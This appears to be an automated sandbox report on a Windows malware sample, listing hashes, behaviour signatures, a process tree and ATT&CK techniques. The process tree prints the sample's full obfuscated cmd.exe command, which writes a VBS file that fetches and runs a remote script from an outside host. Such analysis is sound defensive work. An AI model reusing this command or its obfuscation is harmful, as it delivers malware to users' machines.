Analysis

  • max time kernel
    307s
  • max time network
    297s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    31-03-2023 20:21

General

  • Target

    FACT_RY65855PAT0.exe

  • Size

    1.8MB

  • MD5

    3d6b870b71fe64e9fab41314f4ff75cf

  • SHA1

    45e91fc8eb9cace7143d06a39166108b5531607a

  • SHA256

    1eeb7c8ef775f5bf2f0e19d3fccc2df475aadb65a039fbdc0593ed48d6ed24ae

  • SHA512

    d093533ca4ca8e82029ef47c4135e15c99494e25d9db3ce49d06fb89cce44ee934288e98b15561b95911522a3f1b5e49f23a853b68389e53caebd7c88194c5d9

  • SSDEEP

    49152:eGj78kv0nmHkhPk0+mzTcg/S1OJqqA0ieped:ZXrv/Hky0RzPSMJ9AQod

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FACT_RY65855PAT0.exe
    "C:\Users\Admin\AppData\Local\Temp\FACT_RY65855PAT0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4436
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo mf8=".":hk85=":":gn2="/":GetObject("scripT"+hk85+"https"+hk85+"//mtx"+mf8+"zzux"+mf8+"com/njmr1")>%Public%\h587.vBs&&%ComSpec% /c start %Public%\h587.vBs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1000
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /V/D/c "echo mf8=".":hk85=":":gn2="/":GetObject("scripT"+hk85+"https"+hk85+"//mtx"+mf8+"zzux"+mf8+"com/njmr1")>C:\Users\Public\h587.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\h587.vBs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c start C:\Users\Public\h587.vBs
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1568
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Public\h587.vBs"
            5⤵
            • Blocklisted process makes network request
            PID:3816

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\h587.vBs
    Filesize

    99B

    MD5

    0a7ccba24c3dd86e5af2e22e583e974c

    SHA1

    2dad8b33c4bbcc73cbd61f94d5f17af392c0ebd8

    SHA256

    9d69d5dd7aea0e2e3f4a18551bc6b1bfa8ab77c528fd1a5a29e3c4baf471c43f

    SHA512

    c7aabaebd16b16cff069d776ca06810aa60e9c950080c2503deaa93a22bb06b491b0cbaafb5b5917abf9b6e430558356612e08537444e34be0f966c0cd1ab249

  • memory/4436-133-0x0000000000510000-0x00000000006E8000-memory.dmp
    Filesize

    1.8MB

  • memory/4436-150-0x0000000000510000-0x00000000006E8000-memory.dmp
    Filesize

    1.8MB

  • memory/4436-151-0x0000000000510000-0x00000000006E8000-memory.dmp
    Filesize

    1.8MB